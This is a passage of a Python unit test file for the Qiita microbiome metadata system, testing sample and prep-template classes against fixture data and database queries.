'Sample2': {'int_col': 2, 'float_col': 3.1, 'str_col': '200'},
'Sample3': {'int_col': 3, 'float_col': 3, 'str_col': 'string30'},
}
self.metadata_map = pd.DataFrame.from_dict(metadata_dict,
orient='index')
self.headers = ['float_col', 'str_col', 'int_col']
def test_get_datatypes(self):
"""Correctly returns the data types of each column"""
obs = _get_datatypes(self.metadata_map.ix[:, self.headers])
exp = ['float8', 'varchar', 'integer']
self.assertEqual(obs, exp)
def test_as_python_types(self):
"""Correctly returns the columns as python types"""
obs = _as_python_types(self.metadata_map, self.headers)
exp = [[2.1, 3.1, 3],
['str1', '200', 'string30'],
[1, 2, 3]]
self.assertEqual(obs, exp)
def test_prefix_sample_names_with_id(self):
exp_metadata_dict = {
'1.Sample1': {'int_col': 1, 'float_col': 2.1, 'str_col': 'str1'},
'1.Sample2': {'int_col': 2, 'float_col': 3.1, 'str_col': '200'},
'1.Sample3': {'int_col': 3, 'float_col': 3, 'str_col': 'string30'},
}
exp_df = pd.DataFrame.from_dict(exp_metadata_dict, orient='index')
_prefix_sample_names_with_id(self.metadata_map, 1)
self.metadata_map.sort_index(inplace=True)
exp_df.sort_index(inplace=True)
assert_frame_equal(self.metadata_map, exp_df)
@qiita_test_checker()
class TestBaseSample(TestCase):
"""Tests the BaseSample class"""
def test_init(self):
"""BaseSample init should raise an error (it's a base class)"""
with self.assertRaises(IncompetentQiitaDeveloperError):
BaseSample('SKM7.640188', SampleTemplate(1))
def test_exists(self):
"""exists should raise an error if called from the base class"""
with self.assertRaises(IncompetentQiitaDeveloperError):
BaseSample.exists('SKM7.640188', SampleTemplate(1))
@qiita_test_checker()
class TestSample(TestCase):
"""Tests the Sample class"""
def setUp(self):
self.sample_template = SampleTemplate(1)
self.sample_id = '1.SKB8.640193'
self.tester = Sample(self.sample_id, self.sample_template)
self.exp_categories = {'physical_location', 'has_physical_specimen',
'has_extracted_data', 'sample_type',
'required_sample_info_status',
'collection_timestamp', 'host_subject_id',
'description', 'season_environment',
'assigned_from_geo', 'texture', 'taxon_id',
'depth', 'host_taxid', 'common_name',
'water_content_soil', 'elevation', 'temp',
'tot_nitro', 'samp_salinity', 'altitude',
'env_biome', 'country', 'ph', 'anonymized_name',
'tot_org_carb', 'description_duplicate',
'env_feature', 'latitude', 'longitude'}
def test_init_unknown_error(self):
"""Init raises an error if the sample id is not found in the template
"""
with self.assertRaises(QiitaDBUnknownIDError):
Sample('Not_a_Sample', self.sample_template)
def test_init_wrong_template(self):
"""Raises an error if using a PrepTemplate instead of SampleTemplate"""
with self.assertRaises(IncompetentQiitaDeveloperError):
Sample('SKB8.640193', PrepTemplate(1))
def test_init(self):
"""Init correctly initializes the sample object"""
sample = Sample(self.sample_id, self.sample_template)
# Check that the internal id have been correctly set
self.assertEqual(sample._id, '1.SKB8.640193')
# Check that the internal template have been correctly set
self.assertEqual(sample._md_template, self.sample_template)
# Check that the internal dynamic table name have been correctly set
self.assertEqual(sample._dynamic_table, "sample_1")
def test_eq_true(self):
"""Equality correctly returns true"""
other = Sample(self.sample_id, self.sample_template)
self.assertTrue(self.tester == other)
def test_eq_false_type(self):
"""Equality returns false if types are not equal"""
other = PrepSample(self.sample_id, PrepTemplate(1))
self.assertFalse(self.tester == other)
def test_eq_false_id(self):
"""Equality returns false if ids are different"""
other = Sample('1.SKD8.640184', self.sample_template)
self.assertFalse(self.tester == other)
def test_exists_true(self):
"""Exists returns true if the sample exists"""
self.assertTrue(Sample.exists(self.sample_id, self.sample_template))
def test_exists_false(self):
"""Exists returns false if the sample does not exists"""
self.assertFalse(Sample.exists('Not_a_Sample', self.sample_template))
def test_get_categories(self):
"""Correctly returns the set of category headers"""
obs = self.tester._get_categories(self.conn_handler)
self.assertEqual(obs, self.exp_categories)
def test_len(self):
"""Len returns the correct number of categories"""
self.assertEqual(len(self.tester), 30)
def test_getitem_required(self):
"""Get item returns the correct metadata value from the required table
"""
self.assertEqual(self.tester['physical_location'], 'ANL')
self.assertEqual(self.tester['collection_timestamp'],
datetime(2011, 11, 11, 13, 00, 00))
self.assertTrue(self.tester['has_physical_specimen'])
def test_getitem_dynamic(self):
"""Get item returns the correct metadata value from the dynamic table
"""
self.assertEqual(self.tester['SEASON_ENVIRONMENT'], 'winter')
self.assertEqual(self.tester['depth'], 0.15)
def test_getitem_id_column(self):
"""Get item returns the correct metadata value from the changed column
"""
self.assertEqual(self.tester['required_sample_info_status'],
'completed')
def test_getitem_error(self):
"""Get item raises an error if category does not exists"""
with self.assertRaises(KeyError):
self.tester['Not_a_Category']
def test_setitem(self):
with self.assertRaises(QiitaDBColumnError):
self.tester['column that does not exist'] = 0.30
self.assertEqual(self.tester['tot_nitro'], 1.41)
self.tester['tot_nitro'] = '1234.5'
self.assertEqual(self.tester['tot_nitro'], 1234.5)
def test_delitem(self):
"""delitem raises an error (currently not allowed)"""
with self.assertRaises(QiitaDBNotImplementedError):
del self.tester['DEPTH']
def test_iter(self):
"""iter returns an iterator over the category headers"""
obs = self.tester.__iter__()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_categories)
def test_contains_true(self):
"""contains returns true if the category header exists"""
self.assertTrue('DEPTH' in self.tester)
self.assertTrue('depth' in self.tester)
def test_contains_false(self):
"""contains returns false if the category header does not exists"""
self.assertFalse('Not_a_Category' in self.tester)
def test_keys(self):
"""keys returns an iterator over the metadata headers"""
obs = self.tester.keys()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_categories)
def test_values(self):
"""values returns an iterator over the values"""
obs = self.tester.values()
self.assertTrue(isinstance(obs, Iterable))
exp = {'ANL', True, True, 'ENVO:soil', 'completed',
datetime(2011, 11, 11, 13, 00, 00), '1001:M7',
'Cannabis Soil Microbiome', 'winter', 'n',
'64.6 sand, 17.6 silt, 17.8 clay', '1118232', 0.15, '3483',
'root metagenome', 0.164, 114, 15, 1.41, 7.15, 0,
'ENVO:Temperate grasslands, savannas, and shrubland biome',
'GAZ:United States of America', 6.94, 'SKB8', 5,
'Burmese root', 'ENVO:plant-associated habitat', 74.0894932572,
65.3283470202}
self.assertEqual(set(obs), exp)
def test_items(self):
"""items returns an iterator over the (key, value) tuples"""
obs = self.tester.items()
self.assertTrue(isinstance(obs, Iterable))
exp = {('physical_location', 'ANL'), ('has_physical_specimen', True),
('has_extracted_data', True), ('sample_type', 'ENVO:soil'),
('required_sample_info_status', 'completed'),
('collection_timestamp', datetime(2011, 11, 11, 13, 00, 00)),
('host_subject_id', '1001:M7'),
('description', 'Cannabis Soil Microbiome'),
('season_environment', 'winter'), ('assigned_from_geo', 'n'),
('texture', '64.6 sand, 17.6 silt, 17.8 clay'),
('taxon_id', '1118232'), ('depth', 0.15),
('host_taxid', '3483'), ('common_name', 'root metagenome'),
('water_content_soil', 0.164), ('elevation', 114), ('temp', 15),
('tot_nitro', 1.41), ('samp_salinity', 7.15), ('altitude', 0),
('env_biome',
'ENVO:Temperate grasslands, savannas, and shrubland biome'),
('country', 'GAZ:United States of America'), ('ph', 6.94),
('anonymized_name', 'SKB8'), ('tot_org_carb', 5),
('description_duplicate', 'Burmese root'),
('env_feature', 'ENVO:plant-associated habitat'),
('latitude', 74.0894932572),
('longitude', 65.3283470202)}
self.assertEqual(set(obs), exp)
def test_get(self):
"""get returns the correct sample object"""
self.assertEqual(self.tester.get('SEASON_ENVIRONMENT'), 'winter')
self.assertEqual(self.tester.get('depth'), 0.15)
def test_get_none(self):
"""get returns none if the sample id is not present"""
self.assertTrue(self.tester.get('Not_a_Category') is None)
@qiita_test_checker()
class TestPrepSample(TestCase):
"""Tests the PrepSample class"""
def setUp(self):
self.prep_template = PrepTemplate(1)
self.sample_id = '1.SKB8.640193'
self.tester = PrepSample(self.sample_id, self.prep_template)
self.exp_categories = {'center_name', 'center_project_name',
'emp_status', 'barcodesequence',
'library_construction_protocol',
'linkerprimersequence', 'target_subfragment',
'target_gene', 'run_center', 'run_prefix',
'run_date', 'experiment_center',
'experiment_design_description',
'experiment_title', 'platform', 'samp_size',
'sequencing_meth', 'illumina_technology',
'sample_center', 'pcr_primers', 'study_center'}
def test_init_unknown_error(self):
"""Init errors if the PrepSample id is not found in the template"""
with self.assertRaises(QiitaDBUnknownIDError):
PrepSample('Not_a_Sample', self.prep_template)
def test_init_wrong_template(self):
"""Raises an error if using a SampleTemplate instead of PrepTemplate"""
with self.assertRaises(IncompetentQiitaDeveloperError):
PrepSample('1.SKB8.640193', SampleTemplate(1))
def test_init(self):
"""Init correctly initializes the PrepSample object"""
sample = PrepSample(self.sample_id, self.prep_template)
# Check that the internal id have been correctly set
self.assertEqual(sample._id, '1.SKB8.640193')
# Check that the internal template have been correctly set
self.assertEqual(sample._md_template, self.prep_template)
# Check that the internal dynamic table name have been correctly set
self.assertEqual(sample._dynamic_table, "prep_1")
def test_eq_true(self):
"""Equality correctly returns true"""
other = PrepSample(self.sample_id, self.prep_template)
self.assertTrue(self.tester == other)
def test_eq_false_type(self):
"""Equality returns false if types are not equal"""
other = Sample(self.sample_id, SampleTemplate(1))
self.assertFalse(self.tester == other)
def test_eq_false_id(self):
"""Equality returns false if ids are different"""
other = PrepSample('1.SKD8.640184', self.prep_template)
self.assertFalse(self.tester == other)
def test_exists_true(self):
"""Exists returns true if the PrepSample exists"""
self.assertTrue(PrepSample.exists(self.sample_id, self.prep_template))
def test_exists_false(self):
"""Exists returns false if the PrepSample does not exists"""
self.assertFalse(PrepSample.exists('Not_a_Sample', self.prep_template))
def test_get_categories(self):
"""Correctly returns the set of category headers"""
obs = self.tester._get_categories(self.conn_handler)
self.assertEqual(obs, self.exp_categories)
def test_len(self):
"""Len returns the correct number of categories"""
self.assertEqual(len(self.tester), 21)
def test_getitem_required(self):
"""Get item returns the correct metadata value from the required table
"""
self.assertEqual(self.tester['center_name'], 'ANL')
self.assertTrue(self.tester['center_project_name'] is None)
def test_getitem_dynamic(self):
"""Get item returns the correct metadata value from the dynamic table
"""
self.assertEqual(self.tester['pcr_primers'],
'FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT')
self.assertEqual(self.tester['barcodesequence'], 'AGCGCTCACATC')
def test_getitem_id_column(self):
"""Get item returns the correct metadata value from the changed column
"""
self.assertEqual(self.tester['emp_status'], 'EMP')
def test_getitem_error(self):
"""Get item raises an error if category does not exists"""
with self.assertRaises(KeyError):
self.tester['Not_a_Category']
def test_setitem(self):
"""setitem raises an error (currently not allowed)"""
with self.assertRaises(QiitaDBNotImplementedError):
self.tester['barcodesequence'] = 'GTCCGCAAGTTA'
def test_delitem(self):
"""delitem raises an error (currently not allowed)"""
with self.assertRaises(QiitaDBNotImplementedError):
del self.tester['pcr_primers']
def test_iter(self):
"""iter returns an iterator over the category headers"""
obs = self.tester.__iter__()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_categories)
def test_contains_true(self):
"""contains returns true if the category header exists"""
self.assertTrue('BarcodeSequence' in self.tester)
self.assertTrue('barcodesequence' in self.tester)
def test_contains_false(self):
"""contains returns false if the category header does not exists"""
self.assertFalse('Not_a_Category' in self.tester)
def test_keys(self):
"""keys returns an iterator over the metadata headers"""
obs = self.tester.keys()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_categories)
def test_values(self):
"""values returns an iterator over the values"""
obs = self.tester.values()
self.assertTrue(isinstance(obs, Iterable))
exp = {'ANL', None, None, None, 'EMP', 'AGCGCTCACATC',
'This analysis was done as in Caporaso et al 2011 Genome '
'research. The PCR primers (F515/R806) were developed against '
'the V4 region of the 16S rRNA (both bacteria and archaea), '
'which we determined would yield optimal community clustering '
'with reads of this length using a procedure similar to that of'
' ref. 15. [For reference, this primer pair amplifies the '
'region 533_786 in the Escherichia coli strain 83972 sequence '
'(greengenes accession no. prokMSA_id:470367).] The reverse PCR'
' primer is barcoded with a 12-base error-correcting Golay code'
' to facilitate multiplexing of up to 1,500 samples per lane, '
'and both PCR primers contain sequencer adapter regions.',
'GTGCCAGCMGCCGCGGTAA', 'V4', '16S rRNA', 'ANL',
's_G1_L001_sequences', '8/1/12', 'ANL',
'micro biome of soil and rhizosphere of cannabis plants from '
'CA', 'Cannabis Soil Microbiome', 'Illumina', '.25,g',
'Sequencing by synthesis', 'MiSeq', 'ANL',
'FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT', 'CCME'}
self.assertEqual(set(obs), exp)
def test_items(self):
"""items returns an iterator over the (key, value) tuples"""
obs = self.tester.items()
self.assertTrue(isinstance(obs, Iterable))
exp = {('center_name', 'ANL'), ('center_project_name', None),
('emp_status', 'EMP'), ('barcodesequence', 'AGCGCTCACATC'),
('library_construction_protocol',
'This analysis was done as in Caporaso et al 2011 Genome '
'research. The PCR primers (F515/R806) were developed against '
'the V4 region of the 16S rRNA (both bacteria and archaea), '
'which we determined would yield optimal community clustering '
'with reads of this length using a procedure similar to that '
'of ref. 15. [For reference, this primer pair amplifies the '
'region 533_786 in the Escherichia coli strain 83972 sequence '
'(greengenes accession no. prokMSA_id:470367).] The reverse '
'PCR primer is barcoded with a 12-base error-correcting Golay '
'code to facilitate multiplexing of up to 1,500 samples per '
'lane, and both PCR primers contain sequencer adapter '
'regions.'), ('linkerprimersequence', 'GTGCCAGCMGCCGCGGTAA'),
('target_subfragment', 'V4'), ('target_gene', '16S rRNA'),
('run_center', 'ANL'), ('run_prefix', 's_G1_L001_sequences'),
('run_date', '8/1/12'), ('experiment_center', 'ANL'),
('experiment_design_description',
'micro biome of soil and rhizosphere of cannabis plants '
'from CA'), ('experiment_title', 'Cannabis Soil Microbiome'),
('platform', 'Illumina'), ('samp_size', '.25,g'),
('sequencing_meth', 'Sequencing by synthesis'),
('illumina_technology', 'MiSeq'), ('sample_center', 'ANL'),
('pcr_primers',
'FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT'),
('study_center', 'CCME')}
self.assertEqual(set(obs), exp)
def test_get(self):
"""get returns the correct sample object"""
self.assertEqual(self.tester.get('barcodesequence'), 'AGCGCTCACATC')
def test_get_none(self):
"""get returns none if the sample id is not present"""
self.assertTrue(self.tester.get('Not_a_Category') is None)
@qiita_test_checker()
class TestMetadataTemplate(TestCase):
"""Tests the MetadataTemplate base class"""
def setUp(self):
self.study = Study(1)
def test_init(self):
"""Init raises an error because it's not called from a subclass"""
with self.assertRaises(IncompetentQiitaDeveloperError):
MetadataTemplate(1)
def test_create(self):
"""Create raises an error because it's not called from a subclass"""
with self.assertRaises(QiitaDBNotImplementedError):
MetadataTemplate.create()
def test_exist(self):
"""Exists raises an error because it's not called from a subclass"""
with self.assertRaises(IncompetentQiitaDeveloperError):
MetadataTemplate.exists(self.study)
def test_table_name(self):
"""table name raises an error because it's not called from a subclass
"""
with self.assertRaises(IncompetentQiitaDeveloperError):
MetadataTemplate._table_name(self.study)
@qiita_test_checker()
class TestSampleTemplate(TestCase):
"""Tests the SampleTemplate class"""
def setUp(self):
self.metadata_dict = {
'Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'int_column': 1,
'latitude': 42.42,
'longitude': 41.41},
'Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'int_column': 2,
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'latitude': 4.2,
'longitude': 1.1},
'Sample3': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'int_column': 3,
'latitude': 4.8,
'longitude': 4.41},
}
self.metadata = pd.DataFrame.from_dict(self.metadata_dict,
orient='index')
metadata_str_prefix_dict = {
'foo.Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'latitude': 42.42,
'longitude': 41.41},
'bar.Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'latitude': 4.2,
'longitude': 1.1},
'foo.Sample3': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'latitude': 4.8,
'longitude': 4.41},
}
self.metadata_str_prefix = pd.DataFrame.from_dict(
metadata_str_prefix_dict, orient='index')
metadata_int_prefix_dict = {
'12.Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'latitude': 42.42,
'longitude': 41.41},
'12.Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'latitude': 4.2,
'longitude': 1.1},
'12.Sample3': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'latitude': 4.8,
'longitude': 4.41},
}
self.metadata_int_pref = pd.DataFrame.from_dict(
metadata_int_prefix_dict, orient='index')
metadata_prefixed_dict = {
'2.Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'latitude': 42.42,
'longitude': 41.41},
'2.Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'latitude': 4.2,
'longitude': 1.1},
'2.Sample3': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'latitude': 4.8,
'longitude': 4.41},
}
self.metadata_prefixed = pd.DataFrame.from_dict(
metadata_prefixed_dict, orient='index')
self.test_study = Study(1)
info = {
"timeseries_type_id": 1,
"metadata_complete": True,
"mixs_compliant": True,
"number_samples_collected": 25,
"number_samples_promised": 28,
"portal_type_id": 3,
"study_alias": "FCM",
"study_description": "Microbiome of people who eat nothing but "
"fried chicken",
"study_abstract": "Exploring how a high fat diet changes the "
"gut microbiome",
"emp_person_id": StudyPerson(2),
"principal_investigator_id": StudyPerson(3),
"lab_person_id": StudyPerson(1)
}
self.new_study = Study.create(User('test@foo.bar'),
"Fried Chicken Microbiome", [1], info)
self.tester = SampleTemplate(1)
self.exp_sample_ids = {
'1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195', '1.SKB4.640189',
'1.SKB5.640181', '1.SKB6.640176', '1.SKB7.640196', '1.SKB8.640193',
'1.SKB9.640200', '1.SKD1.640179', '1.SKD2.640178', '1.SKD3.640198',
'1.SKD4.640185', '1.SKD5.640186', '1.SKD6.640190', '1.SKD7.640191',
'1.SKD8.640184', '1.SKD9.640182', '1.SKM1.640183', '1.SKM2.640199',
'1.SKM3.640197', '1.SKM4.640180', '1.SKM5.640177', '1.SKM6.640187',
'1.SKM7.640188', '1.SKM8.640201', '1.SKM9.640192'}
self._clean_up_files = []
self.metadata_dict_updated_dict = {
'Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '6',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'int_column': 1,
'latitude': 42.42,
'longitude': 41.41},
'Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '5',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'the only one',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'int_column': 2,
'latitude': 4.2,
'longitude': 1.1},
'Sample3': {'physical_location': 'new location',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '10',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'int_column': 3,
'latitude': 4.8,
'longitude': 4.41},
}
self.metadata_dict_updated = pd.DataFrame.from_dict(
self.metadata_dict_updated_dict, orient='index')
metadata_dict_updated_sample_error = {
'Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '6',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'int_column': 1,
'latitude': 42.42,
'longitude': 41.41},
'Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '5',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'the only one',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'int_column': 2,
'latitude': 4.2,
'longitude': 1.1},
'Sample3': {'physical_location': 'new location',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '10',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'int_column': 3,
'latitude': 4.8,
'longitude': 4.41},
'Sample4': {'physical_location': 'new location',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '10',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 4',
'str_column': 'Value for sample 4',
'int_column': 4,
'latitude': 4.8,
'longitude': 4.41}
}
self.metadata_dict_updated_sample_error = pd.DataFrame.from_dict(
metadata_dict_updated_sample_error, orient='index')
metadata_dict_updated_column_error = {
'Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '6',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'int_column': 1,
'latitude': 42.42,
'longitude': 41.41,
'extra_col': True},
'Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '5',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'the only one',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'int_column': 2,
'latitude': 4.2,
'longitude': 1.1,
'extra_col': True},
'Sample3': {'physical_location': 'new location',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '10',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'int_column': 3,
'latitude': 4.8,
'longitude': 4.41,
'extra_col': True},
}
self.metadata_dict_updated_column_error = pd.DataFrame.from_dict(
metadata_dict_updated_column_error, orient='index')
def tearDown(self):
for f in self._clean_up_files:
remove(f)
def test_study_id(self):
"""Ensure that the correct study ID is returned"""
self.assertEqual(self.tester.study_id, 1)
def test_init_unknown_error(self):
"""Init raises an error if the id is not known"""
with self.assertRaises(QiitaDBUnknownIDError):
SampleTemplate(2)
def test_init(self):
"""Init successfully instantiates the object"""
st = SampleTemplate(1)
self.assertTrue(st.id, 1)
def test_table_name(self):
"""Table name return the correct string"""
obs = SampleTemplate._table_name(self.test_study.id)
self.assertEqual(obs, "sample_1")
def test_create_duplicate(self):
"""Create raises an error when creating a duplicated SampleTemplate"""
with self.assertRaises(QiitaDBDuplicateError):
SampleTemplate.create(self.metadata, self.test_study)
def test_create_duplicate_header(self):
"""Create raises an error when duplicate headers are present"""
self.metadata['STR_COLUMN'] = pd.Series(['', '', ''],
index=self.metadata.index)
with self.assertRaises(QiitaDBDuplicateHeaderError):
SampleTemplate.create(self.metadata, self.new_study)
def test_create_bad_sample_names(self):
"""Create raises an error when duplicate headers are present"""
# set a horrible list of sample names
self.metadata.index = ['o()xxxx[{::::::::>', 'sample.1', 'sample.3']
with self.assertRaises(QiitaDBColumnError):
SampleTemplate.create(self.metadata, self.new_study)
def test_create_error_cleanup(self):
"""Create does not modify the database if an error happens"""
metadata_dict = {
'Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'group': 'Forcing the creation to fail',
'latitude': 42.42,
'longitude': 41.41}
}
metadata = pd.DataFrame.from_dict(metadata_dict, orient='index')
with self.assertRaises(QiitaDBExecutionError):
SampleTemplate.create(metadata, self.new_study)
sql = """SELECT EXISTS(
SELECT * FROM qiita.required_sample_info
WHERE sample_id=%s)"""
sample_id = "%d.Sample1" % self.new_study.id
self.assertFalse(
self.conn_handler.execute_fetchone(sql, (sample_id,))[0])
sql = """SELECT EXISTS(
SELECT * FROM qiita.study_sample_columns
WHERE study_id=%s)"""
self.assertFalse(
self.conn_handler.execute_fetchone(sql, (self.new_study.id,))[0])
self.assertFalse(
exists_table("sample_%d" % self.new_study.id, self.conn_handler))
def test_create(self):
"""Creates a new SampleTemplate"""
st = SampleTemplate.create(self.metadata, self.new_study)
# The returned object has the correct id
self.assertEqual(st.id, 2)
# The relevant rows to required_sample_info have been added.
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.required_sample_info WHERE study_id=2")
# sample_id study_id physical_location has_physical_specimen
# has_extracted_data sample_type required_sample_info_status_id
# collection_timestamp host_subject_id description
exp = [["2.Sample1", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 1", 42.42, 41.41],
["2.Sample2", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 2", 4.2, 1.1],
["2.Sample3", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 3", 4.8, 4.41]]
self.assertEqual(obs, exp)
# The relevant rows have been added to the study_sample_columns
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.study_sample_columns WHERE study_id=2")
# study_id, column_name, column_type
exp = [[2, "str_column", "varchar"], [2L, 'int_column', 'integer']]
self.assertEqual(obs, exp)
# The new table exists
self.assertTrue(exists_table("sample_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.sample_2")
# sample_id, str_column
exp = [['2.Sample1', 1, "Value for sample 1"],
['2.Sample2', 2, "Value for sample 2"],
['2.Sample3', 3, "Value for sample 3"]]
self.assertEqual(obs, exp)
def test_create_int_prefix(self):
"""Creates a new SampleTemplate"""
st = SampleTemplate.create(self.metadata_int_pref, self.new_study)
# The returned object has the correct id
self.assertEqual(st.id, 2)
# The relevant rows to required_sample_info have been added.
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.required_sample_info WHERE study_id=2")
# sample_id study_id physical_location has_physical_specimen
# has_extracted_data sample_type required_sample_info_status_id
# collection_timestamp host_subject_id description
exp = [["2.12.Sample1", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 1", 42.42, 41.41],
["2.12.Sample2", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 2", 4.2, 1.1],
["2.12.Sample3", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 3", 4.8, 4.41]]
